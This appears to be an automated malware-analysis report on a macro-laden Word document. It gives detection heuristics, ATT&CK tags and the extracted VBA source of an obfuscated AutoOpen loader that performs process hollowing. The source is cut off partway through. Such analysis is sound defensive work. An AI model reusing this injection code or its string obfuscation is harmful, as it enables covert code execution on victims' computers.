MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OOXML document containing a highly obfuscated VBA macro loader. The presence of AutoOpen, GetObject calls, and an obfuscated auto-exec loader strongly suggests the intent to download and execute a second-stage payload. No specific family could be identified due to the heavy obfuscation.
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
cvwlu = "." Set UxdB = GetObject(hGGsS("2XxYkL2m2CV9jXxmRNHgRXZYO4KSkXsVi4ixkWISk4axRrB7kuFEi4Eh4FJ=") & cvwlu & hGGsS("4CU7kPKROXxm21e=")) Set sQKvIC = UxdB.ExecQuery(hGGsS("DXHyiLBEeotlirU7kfa4vLz+VxZ3RNHgO4KSku2bj4BEiLE=")) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
cvwlu = "." Set UxdB = GetObject(hGGsS("2XxYkL2m2CV9jXxmRNHgRXZYO4KSkXsVi4ixkWISk4axRrB7kuFEi4Eh4FJ=") & cvwlu & hGGsS("4CU7kPKROXxm21e=")) Set sQKvIC = UxdB.ExecQuery(hGGsS("DXHyiLBEeotlirU7kfa4vLz+VxZ3RNHgO4KSku2bj4BEiLE=")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Public Sub AutoOpen() Call ecuuxx -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 27215 bytes |
SHA-256: a8334c74ec0852a0f0513683974dd154a8d615eb44424892b244406df304bc38 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Const faQQGe = "hJazhEDezutwVddxWBRyUuDOXDQzUqgfSnPzgWHZxoRxwiaoVflFtFBJhLxZKfYRVjqMfFVnSoEDttSHJHAeszEJdtVETuDiPJnGBtJIEzcWiebxhMdfEmZvHStmyUDwStPKwftYHzvpEOqLVhibFliBMrSIIogpncVRehUxlzmTZFnJqvhXsZQzycbxCRimlgCfzJexPCMdDdXqy"
#If Win64 Then
Private Type AEwDj
l As LongLong
h As LongLong
End Type
#End If
Private Const KdCvq = 16
Private Const DcHYJe = 8
Private Const qKhhmZ = 512
Private Const KboWq = 80
#If Win64 Then
Private Type ykwrH
a As Integer
b As Integer
c As Byte
d As Byte
e As Integer
f As Long
g As Integer
h As Integer
i As Long
j As Integer
k As Integer
l As Long
m As Long
n(8 - 1) As AEwDj
o(16 - 1) As AEwDj
q(96 - 1) As Byte
End Type
#End If
Private Type UIdMhY
YpOBSY As Long
jENbd As Long
End Type
Private Type yYLr
a As Long
b As Long
c As Long
d As Long
e As Long
f As Long
g As Long
h(KboWq - 1) As Byte
i As Long
End Type
Private Type RTIf
QdXMx As Integer
BxdGn As Integer
a As Long
b As Long
c As Long
d As Integer
e As Integer
End Type
Private Type jtoTlp
#If Win64 Then
a As Integer
b As Byte
c As Byte
d As Long
e As Long
f As Long
vizN As Long
g As Long
labilr As LongLong
i As Long
j As Long
k As Integer
l As Integer
m As Integer
n As Integer
o As Integer
p As Integer
q As Long
uDAsl As Long
rVUVit As Long
r As Long
s As Integer
t As Integer
u As LongLong
v As LongLong
w As LongLong
x As LongLong
y As Long
z As Long
JOKj(KdCvq - 1) As UIdMhY
#Else
a As Integer
b As Byte
c As Byte
d As Long
e As Long
f As Long
vizN As Long
g As Long
h As Long
labilr As Long
i As Long
j As Long
k As Integer
l As Integer
m As Integer
n As Integer
o As Integer
p As Integer
q As Long
uDAsl As Long
rVUVit As Long
r As Long
s As Integer
t As Integer
u As Long
v As Long
w As Long
x As Long
y As Long
z As Long
JOKj(KdCvq - 1) As UIdMhY
#End If
End Type
Private Type AMAm
#If Win64 Then
a1 As LongLong
a2 As LongLong
a3 As LongLong
a4 As LongLong
a5 As LongLong
a6 As LongLong
gjpHMz As Long
b1 As Long
b2 As Integer
b3 As Integer
b4 As Integer
b5 As Integer
b6 As Integer
b7 As Integer
b8 As Long
c1 As LongLong
c2 As LongLong
c3 As LongLong
c4 As LongLong
c5 As LongLong
c7 As LongLong
d1 As LongLong
TUtr As LongLong
LoQwg As LongLong
d2 As LongLong
d3 As LongLong
d4 As LongLong
d5 As LongLong
d6 As LongLong
e1 As LongLong
e2 As LongLong
e3 As LongLong
e4 As LongLong
e5 As LongLong
e6 As LongLong
e7 As LongLong
e8 As LongLong
e9 As LongLong
f1 As ykwrH
f2(26 - 1) As AEwDj
f3 As LongLong
f4 As LongLong
f5 As LongLong
f6 As LongLong
f7 As LongLong
f8 As LongLong
#Else
gjpHMz As Long
a As Long
b As Long
c As Long
d As Long
e As Long
f As Long
g As yYLr
h As Long
i As Long
j As Long
k As Long
l As Long
m As Long
tGpi As Long
n As Long
o As Long
vnFgE As Long
q As Long
r As Long
s As Long
t As Long
u As Long
v As Long
w(qKhhmZ - 1) As Byte
#End If
End Type
Private Type wvLO
NtEnt(DcHYJe - 1) As Byte
a As Long
FNlCx As Long
qftsSA As Long
ddxYs As Long
b As Long
c As Long
d As Integer
e As Integer
f As Long
End Type
Private Type MKPrK
Satx As Long
IPcoLv As RTIf
QEoJt As jtoTlp
End Type
Private Type HfBySv
GfRx As LongPtr
FXBYNC As LongPtr
a As Long
b As Long
End Type
Private Type MSXCq
WONa As Long
HyeEo As Long
End Type
Private Type IrzMRQ
kPYKfS As Integer
a As Integer
b As Integer
c As Integer
d As Integer
e As Integer
f As Integer
g As Integer
h As Integer
i As Integer
j As Integer
k As Integer
l As Integer
m As Integer
n(4 - 1) As Integer
o As Integer
p As Integer
q(10 - 1) As Integer
IOpwT As Long
End Type
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As WxOLed, lpProcessInformation As HfBySv) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As WxOLed, lpProcessInformation As HfBySv) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As AMAm) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As AMAm) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
Private Const AdvW = &H1000
Private Const MGYPq = &H2000
'Private Const PAGE_READWRITE = &H4
Private Const TFsFB = &H40
Private Const gEuwv = 260
Private Const FExse = &H4
Private Const mHnR = &H100000
Private Const RwOv = &H10000
#If Win64 Then
Private Const KtngY = mHnR
#Else
Private Const KtngY = RwOv
#End If
Private Const zzynpU = KtngY Or &H1
Private Const bfVtU = KtngY Or &H2
Private Const GEio = KtngY Or &H4
Private Const SISk = KtngY Or &H8
'Private Const CONTEXT_DEBUG_REGISTERS = KtngY Or &H10
'Private Const CONTEXT_EXTENDED_REGISTERS = KtngY Or &H20
Private Const DOtzf = zzynpU Or bfVtU Or GEio
'Private Const VERBOSE = False
Private Const RLdd = &H5A4D
Private Const CIRNLG = &H4550
Private Const eTjlT = &H14C
Private Const CKikPI = &H8664
Private Const HjAi = 64
Private Const ZFFRNE = 40
Private Const dmnL = 20
Private Const UzRZV = 8
Private Const pelHUt = 8
Private Const rIxaUH = 2
#If Win64 Then
Private Const Jleg = 264
Private Const usxAh = 8
#Else
Private Const Jleg = 248
Private Const usxAh = 4
#End If
'Private Const IMAGE_DIRECTORY_ENTRY_EXPORT = 0
'Private Const IMAGE_DIRECTORY_ENTRY_IMPORT = 1
'Private Const IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
'Private Const IMAGE_DIRECTORY_ENTRY_EXCEPTION = 3
'Private Const IMAGE_DIRECTORY_ENTRY_SECURITY = 4
Private Const LGRL = 5
'Private Const IMAGE_DIRECTORY_ENTRY_DEBUG = 6
'Private Const IMAGE_DIRECTORY_ENTRY_COPYRIGHT = 7
'Private Const IMAGE_DIRECTORY_ENTRY_GLOBALPTR = 8
'Private Const IMAGE_DIRECTORY_ENTRY_TLS = 9
'Private Const IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10
Private Type WxOLed
a As Long
b As String
c As String
d As String
e As Long
f As Long
g As Long
h As Long
i As Long
j As Long
k As Long
jagfF As Long
fjoHnh As Integer
l As Integer
m As LongPtr
n As LongPtr
o As LongPtr
p As LongPtr
End Type
Private Type CIhc
aFxZ As Integer
NeOv As Integer
ZFvE As Integer
nxitVc As Integer
fWhyow As Integer
aGDpA As Integer
tEgXm As Integer
GVXVJ As Integer
zyxAp As Integer
End Type
Public Sub dSbnp(ByRef axEZ() As Byte, strArguments As String)
Dim qRJXlA As IrzMRQ
Dim SjsSB As LongPtr: SjsSB = VarPtr(qRJXlA)
Call RtlMoveMemory(SjsSB, VarPtr(axEZ(0)), HjAi)
If Not qRJXlA.kPYKfS = RLdd Then
Exit Sub
End If
Dim kKrysl As MKPrK
Dim KVEhU As LongPtr: KVEhU = VarPtr(kKrysl)
Call RtlMoveMemory(KVEhU, VarPtr(axEZ(qRJXlA.IOpwT)), Jleg)
If Not kKrysl.Satx = CIRNLG Then
Exit Sub
End If
#If Win64 Then
If kKrysl.IPcoLv.QdXMx = eTjlT Then
Exit Sub
End If
#Else
If kKrysl.IPcoLv.QdXMx = CKikPI Then
Exit Sub
End If
#End If
Dim oHGx As String
oHGx = Space(gEuwv)
Dim NfEZn As Long
NfEZn = GetModuleFileName(0, oHGx, gEuwv)
oHGx = Left(oHGx, InStr(oHGx, vbNullChar) - 1)
Dim zkUHCZ As String
zkUHCZ = oHGx + " " + strArguments
Dim CZEMa As String
Dim tEQRo As HfBySv
Dim UHRhOa As WxOLed
UHRhOa.jagfF = 1
UHRhOa.fjoHnh = 0
Dim TOkZ As Long
TOkZ = CreateProcess(CZEMa, oHGx + " " + strArguments, 0&, 0&, False, FExse, 0&, CZEMa, UHRhOa, tEQRo)
If TOkZ = 0 Then
Exit Sub
End If
Dim KlSZh As AMAm
KlSZh.gjpHMz = bfVtU
Dim arAxIk As Long
#If Win64 Then
Dim sXeVn(0 To (LenB(KlSZh) - 1)) As Byte
Call RtlMoveMemory(VarPtr(sXeVn(0)), VarPtr(KlSZh), LenB(KlSZh))
arAxIk = GetThreadContext(tEQRo.FXBYNC, VarPtr(sXeVn(0)))
#Else
arAxIk = GetThreadContext(tEQRo.FXBYNC, KlSZh)
#End If
If arAxIk = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
Else
#If Win64 Then
Call RtlMoveMemory(VarPtr(KlSZh), VarPtr(sXeVn(0)), LenB(KlSZh))
#End If
End If
Dim OsGNJQ As UIdMhY
Call RtlMoveMemory(VarPtr(OsGNJQ), VarPtr(kKrysl.QEoJt.JOKj(LGRL)), UzRZV)
Dim RGhfI As LongPtr: RGhfI = 0
If OsGNJQ.YpOBSY = 0 Then
RGhfI = kKrysl.QEoJt.labilr
End If
Dim ovRj As LongPtr
ovRj = VirtualAllocEx(tEQRo.GfRx, RGhfI, kKrysl.QEoJt.uDAsl, AdvW Or MGYPq, TFsFB)
If ovRj = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
If ovRj <> kKrysl.QEoJt.labilr Then
Dim sQxTRD As Long
Dim reDk As LongPtr
#If Win64 Then
sQxTRD = 0 + qRJXlA.IOpwT + 4 + dmnL + 24
#Else
sQxTRD = 0 + qRJXlA.IOpwT + 4 + dmnL + 28
#End If
Call RtlMoveMemory(VarPtr(axEZ(0 + sQxTRD)), VarPtr(ovRj), usxAh)
End If
Dim CZMXC As LongPtr
CZMXC = VirtualAlloc(0&, kKrysl.QEoJt.uDAsl, AdvW Or MGYPq, TFsFB)
If CZMXC = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Call RtlMoveMemory(CZMXC, VarPtr(axEZ(0)), kKrysl.QEoJt.rVUVit)
Dim ZvPS As Integer
Dim tBueiZ As wvLO
For ZvPS = 0 To (kKrysl.IPcoLv.BxdGn - 1)
Call RtlMoveMemory(VarPtr(tBueiZ), VarPtr(axEZ(qRJXlA.IOpwT + Jleg + (ZvPS * ZFFRNE))), ZFFRNE)
Dim eWnguz As String: eWnguz = ZakOxT(tBueiZ.NtEnt)
Dim ryGZ As LongPtr: ryGZ = CZMXC + tBueiZ.FNlCx
Dim zrpw As Long: zrpw = tBueiZ.qftsSA
Call RtlMoveMemory(ryGZ, VarPtr(axEZ(0 + tBueiZ.ddxYs)), zrpw)
Next ZvPS
If ovRj <> kKrysl.QEoJt.labilr Then
Dim gTCQ As Long: gTCQ = OsGNJQ.jENbd
Dim PnKYGE As Long: PnKYGE = OsGNJQ.YpOBSY
Dim hQfA As MSXCq
Dim zPpTT As Long: zPpTT = 0
Do While zPpTT < gTCQ
Dim cmnCj As LongPtr: cmnCj = CZMXC + PnKYGE + zPpTT
Call RtlMoveMemory(VarPtr(hQfA), cmnCj, pelHUt)
zPpTT = zPpTT + hQfA.HyeEo
If (hQfA.WONa <> 0) And (hQfA.HyeEo <> 0) Then
Dim DwvG As Long: DwvG = (hQfA.HyeEo - pelHUt) / rIxaUH
Dim ZioWQb As Long: ZioWQb = hQfA.WONa
Dim nIhCF As LongPtr: nIhCF = cmnCj + pelHUt
Dim oxMcOM As Integer
Call RtlMoveMemory(VarPtr(oxMcOM), nIhCF, rIxaUH)
ZvPS = 0
For ZvPS = 0 To (DwvG - 1)
Dim KBqA As Integer: KBqA = ((oxMcOM And &HF000) / &H1000) And &HF
Dim ofYp As Integer: ofYp = oxMcOM And &HFFF
If KBqA = 0 Then
Exit For
End If
Dim tXYcq As Integer: tXYcq = 0
If KBqA = &H3 Then
tXYcq = 4
ElseIf KBqA = &HA Then
tXYcq = 8
End If
Dim aoAaKy As LongPtr
aoAaKy = CZMXC + ZioWQb + ofYp
If tXYcq <> 0 Then
Dim xylAbw As LongPtr
Call RtlMoveMemory(VarPtr(xylAbw), aoAaKy, tXYcq)
xylAbw = xylAbw - kKrysl.QEoJt.labilr + ovRj
Call RtlMoveMemory(aoAaKy, VarPtr(xylAbw), tXYcq)
End If
nIhCF = nIhCF + rIxaUH
Call RtlMoveMemory(VarPtr(oxMcOM), nIhCF, rIxaUH)
Next ZvPS
End If
Loop
End If
Dim eHKzD As Long
eHKzD = WriteProcessMemory(tEQRo.GfRx, ovRj, CZMXC, kKrysl.QEoJt.uDAsl, 0&)
If eHKzD = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Call VirtualFree(CZMXC, kKrysl.QEoJt.uDAsl, &H10000)
Dim FUTPN As LongPtr
#If Win64 Then
FUTPN = KlSZh.LoQwg + 16
#Else
FUTPN = KlSZh.tGpi + 8
#End If
eHKzD = WriteProcessMemory(tEQRo.GfRx, FUTPN, VarPtr(ovRj), usxAh, 0&)
If eHKzD = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Dim SFHQRr As LongPtr: SFHQRr = ovRj + kKrysl.QEoJt.vizN
#If Win64 Then
KlSZh.TUtr = SFHQRr
#Else
KlSZh.vnFgE = SFHQRr
#End If
Dim cWcla As Long
#If Win64 Then
Call RtlMoveMemory(VarPtr(sXeVn(0)), VarPtr(KlSZh), LenB(KlSZh))
cWcla = SetThreadContext(tEQRo.FXBYNC, VarPtr(sXeVn(0)))
#Else
cWcla = SetThreadContext(tEQRo.FXBYNC, KlSZh)
#End If
If cWcla = 0 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
Dim hTgZJ As Long
hTgZJ = ResumeThread(tEQRo.FXBYNC)
If Not hTgZJ = 1 Then
Call TerminateProcess(tEQRo.GfRx, 0)
Exit Sub
End If
End Sub
Public Function hGGsS(ByVal WtYFi)
Const HqYhuI = "AaoWqFNCeUMTVBn3cKfbDHL4OivkR2j0lhG1QxurtS8wymY7Jpg+EIXPzs9d5Z/6"
Dim BiFNKb, iwZoMh, kEdOz
WtYFi = Replace(WtYFi, vbCrLf, "")
WtYFi = Replace(WtYFi, vbTab, "")
WtYFi = Replace(WtYFi, " ", "")
BiFNKb = Len(WtYFi)
If BiFNKb Mod 4 <> 0 Then
Exit Function
End If
For kEdOz = 1 To BiFNKb Step 4
Dim zQlaY, vZffu, QWlG, BDmZ, qFoH, JfQloN
zQlaY = 3
qFoH = 0
For vZffu = 0 To 3
QWlG = Mid(WtYFi, kEdOz + vZffu, 1)
If QWlG = "=" Then
zQlaY = zQlaY - 1
BDmZ = 0
Else
BDmZ = InStr(1, HqYhuI, QWlG, vbBinaryCompare) - 1
End If
If BDmZ = -1 Then
Exit Function
End If
qFoH = 64 * qFoH + BDmZ
Next
qFoH = Hex(qFoH)
qFoH = String(6 - Len(qFoH), "0") & qFoH
JfQloN = Chr(CByte("&H" & Mid(qFoH, 1, 2))) + Chr(CByte("&H" & Mid(qFoH, 3, 2))) + Chr(CByte("&H" & Mid(qFoH, 5, 2)))
iwZoMh = iwZoMh & Left(JfQloN, zQlaY)
Next
hGGsS = iwZoMh
End Function
Public Function nquEji(akVQMX() As Byte) As Long
On Error Resume Next
nquEji = UBound(akVQMX) - LBound(akVQMX) + 1
End Function
Private Function JyTt(vppbuW As String) As Byte()
Dim DwaXV() As Byte
Dim rQcAE As Integer: rQcAE = FreeFile
Open vppbuW For Binary Access Read As #rQcAE
ReDim DwaXV(FileLen(vppbuW)) As Byte
Get #rQcAE, , DwaXV
Close #rQcAE
JyTt = DwaXV
End Function
Private Function ZakOxT(baBytes() As Byte) As String
Dim JRVfve As String: JRVfve = ""
Dim WXvnpO As Integer
For WXvnpO = 0 To nquEji(baBytes) - 1
If baBytes(WXvnpO) <> 0 Then
JRVfve = JRVfve & Chr(baBytes(WXvnpO))
Else
Exit For
End If
Next WXvnpO
ZakOxT = JRVfve
End Function
Private Function cxujCQ(XVOBsU As String) As Byte()
Dim TUxQAZ() As Byte
TUxQAZ = StrConv(XVOBsU, vbFromUnicode)
cxujCQ = TUxQAZ
End Function
Public Function xWkMza()
Dim cvwlu As String
Dim UxdB As Variant
Dim sQKvIC As Variant
Dim Vwpgn As Variant
Dim verStr() As String
Dim dFst As Double
cvwlu = "."
Set UxdB = GetObject(hGGsS("2XxYkL2m2CV9jXxmRNHgRXZYO4KSkXsVi4ixkWISk4axRrB7kuFEi4Eh4FJ=") & cvwlu & hGGsS("4CU7kPKROXxm21e="))
Set sQKvIC = UxdB.ExecQuery(hGGsS("DXHyiLBEeotlirU7kfa4vLz+VxZ3RNHgO4KSku2bj4BEiLE="))
For Each Vwpgn In sQKvIC
verStr = Split(Vwpgn.Version, cvwlu)
dFst = CDbl(verStr(0) & cvwlu & verStr(1))
Exit For
Next
If dFst < 6.2 Then
xWkMza = 1
Else
xWkMza = 0
End If
End Function
Public Sub ecuuxx()
Dim yhWAXh As String
Dim kUZqtY() As Byte
Dim FnEr As String
Dim bIsk As String
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlKXs1buHEeoZDDGAGUDFcDqKaHqqx4q2YOEsx2Fp+k4B+RGsxjNDlcuZ7RPKccgaCkuBbkXiE2XFgifelTIBWeqIUbxHDKfA7bD5lVbAlTXOlTIBqeA==")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlcuZ7RPKccgA7HFeleGHHDEHfDFU3KQxVKfHRcuZ7RPKccIpokXZ+2FaWTuHzifelTIBWeqIUbxHDKfA7bD5lV+AlTXOlTIBqeA==")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlcuZ7RPKoVQelTIKfeoexHHBFDxafbEiUbqDx4qU7kPBEDqBRO1UGcXpSiLsETuHzifelTIBWeqIUbxHDKfA7bD5lVbOlTXOlTIBqeA==")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If StrComp(Application.International(wdCurrencyCode), "$") = 0 Then
bIsk = Format(DateAdd("d", 1, Now), "mm-dd-YYYY")
Else
bIsk = Format(DateAdd("d", 1, Now), "YYYY-mm-dd")
End If
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp+OXhEO4BwRgsxjND=")
FnEr = hGGsS("TXBgiLFEifA72NzlKXs1DXZu2C2hRuDlTIKfeoexcHacKqFDcfHRKXs1DXZu2C2hRuHRKXs1DXZu2C2hRuDYi4hxeGA7DEVlbDxnHHKFeoZBbgA+VoA7iGA7DEcl")
kUZqtY = JyTt(yhWAXh)
Call dSbnp(kUZqtY, FnEr & bIsk)
If xWkMza() <> 0 Then
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("TLHJeqUsRNF+RgAmcXZmkLFYioamvXKSRGAQiLsXnQFcDqKaHqFRKXs1buHEeWylUNByvfAZeqsx2gI3OuSxOPclDPx+2NHmTQsx2os4iLUWkNxxkrclngAQOXpSTQhxOLKxRrBkUIH+i4emcL2xkrcr4fAZeo2BkPSSkNq7BfzJeoh4vLsQkP2+eqsDeWOYVbylHXxYB1cdeClXBWylRrO9B+eYVoQlKXH1vX57V1ApnbqgV+elKuxgiDi7jo5PVGzJUgAdeoK1kNQYKNZPkup7OLKNvLpxMo2t2CKJnG572PAYvNxEkXISkuZEifs1kXE7RXIxRPBgTPUx2NZIOXlzTratRoRyeoKxkrO9cHacKqFDcfAweo2RKXs1buHE4CBmRPBgTuKGUgQlnga4vNxyiflQ2CUIifxdeNxueoltKXHETDxEiLElUNHY21SaDFaqcHKaUIpCkuBni4KRRXI+RPeYiNerMfsyiLsr2NllTLHpeWlPVWcSjgaWkPasTDxEiLElTLi7RuBxeoIcO4KteoKxkrO9cHacKqFDcf2RKXs1buHE4CBmRPBgTuKGUgAmKNH+2NxYO4KSkXzlUNHY21SaDFaqcHKaUIpCkuBni4KRRXI+RPeYi4hxU+ylUCUg3fRgVWeJUgAdeqUgiLFweCIZeWylUNByvfsqkP2YkNZhiqiSkNDtUXhE2CA9TgZPRostv4K7kLxYkPKxTuB7kfZ+kLH+RPe7iuFXvLB7kGsSOX56UgyQRreyeoKxkrO9cHacKqFDcfyr4q2YOEsx2Fp1TuKGUgQ=")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
